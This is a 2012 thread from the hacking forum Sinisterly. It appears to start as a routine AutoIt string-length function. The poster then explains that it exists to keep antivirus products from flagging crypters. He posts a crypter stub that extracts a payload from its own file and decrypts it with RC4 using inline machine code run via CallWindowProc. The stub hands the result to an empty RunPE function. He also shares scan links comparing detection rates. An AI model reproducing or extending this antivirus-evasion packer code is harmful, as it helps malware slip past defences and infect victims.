![]() |
|
Alternative StringLen - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Coding (https://sinister.li/Forum-Coding--71) +--- Thread: Alternative StringLen (/Thread-Alternative-StringLen) |
Alternative StringLen - M3 ™ - 09-16-2012 Code: ;=================================================
; Autor : M3
; Proposito : Alternative a StringLen
;==================================================
Func sLenEx($sStr)
Local $Result , $i , $bLen
Do
$i = $i + 1
$bLen = StringLeft($sStr, $i)
$Result = $i
Until $sStr = $bLen
Return $Result
EndFuncRE: Alternative StringLen - Frooxius - 09-16-2012 What's the point of this function, besides being much slower and using more memory than simply using the library function to determine the length of the string? If you're going to make your own function for something that's already provided by the standard libraries of the language, it's when you want to have additional or different functionality or making it more effective if you can. This seems to do exactly the same, but in a dumb way, that's much slower and does a lot of unnecessary operations. Also, what's the point of variable $Result, why can't you just return $i? A very good practice is to write efficient code, don't do unnecessary things, that just results in bad code. Sit back and think "Is this really necessary or even useful? Can it be done simpler?". RE: Alternative StringLen - M3 ™ - 09-16-2012 Some Avs detect StringLen ,its for replacement , thats the point , thanks for comment RE: Alternative StringLen - Frooxius - 09-16-2012 Which AVS? Why do they detect it? StringLen doesn't do anything bad by itself, so it's extremely unlikely that any detection would be focused on StringLen itself. Also you could do it still much simpler, right now it performs the StringLeft operation on the same string many times, so the longer the string is, the longer it will take, I would say that the time requirements grow about quadratically, give or take, which is really bad. If you really need to do it differently, I suggest something with more linear time requirements. Maybe if you need to prevent detection of some operation, you might try to change the code of the operation itself, as StringLen by itself can't raise any suspicion. Also adding more information to the topic might be nice, rather than just putting the code snippet there. RE: Alternative StringLen - M3 ™ - 09-16-2012 yes , add more information to the topic its good , i will make for next Time, and you Rigth about StringLen Function , but only if you use StringLen Alone on code , but when you built a crypter , and have to use other functions like a Split , and Stringlen in the same code , some Avs like Kaspersky , Nod32 , detect this , understand the point ? hope this , sorry for ugli english , i'm from Brasil and dont speek(and write) very well you see xD Regards RE: Alternative StringLen - 1234hotmaster - 09-18-2012 Well I was going to say the exact same thing as Frooxious, Why would someone use a alternative to StringLen and why would AV detect a harmless stringlen for no reason? So your telling me a blank autoit3 program with just StringLen in it would get detected? o.O RE: Alternative StringLen - M3 ™ - 09-18-2012 (09-18-2012, 09:06 AM)1234hotmaster Wrote: Well I was going to say the exact same thing as Frooxious, Why would someone use a alternative to StringLen and why would AV detect a harmless stringlen for no reason? So your telling me a blank autoit3 program with just StringLen in it would get detected? o.O A simple Stub Code , no RunPe , With Alternative StringLen : Detections : http://scanner.udtools.net/reporte.php?id=wbd7_WdFZ Code: #NoTrayIcon
$sKey = "Delimiter"
$File = @ScriptFullPath
$Data = FileRead($file)
$Data = StringMid($Data, StringInstr($Data, $sKey) + sLenEx ($sKey))
$Data = _RC4($Data, "123")
_RunPE($Data)
Func _RC4($DATA, $key)
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $key, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc
Func sLenEx($sStr)
Local $Result , $i , $bLen
Do
$i = $i + 1
$bLen = StringLeft($sStr, $i)
$Result = $i
Until $sStr = $bLen
Return $Result
EndFunc
Func _RunPE($Bynary)
EndFuncWithout alternative : http://scanner.udtools.net/reporte.php?id=an3h_vDtu Compile and Prove , if change The @ScriptFullPath too , no Detection Thanks for reply Regards RE: Alternative StringLen - 1234hotmaster - 09-18-2012 Since when are people making Au3 crypters? o_O RE: Alternative StringLen - M3 ™ - 09-18-2012 yeah dude , a some years ago , will Upload a SRC when I return Home , stay on work now Regards |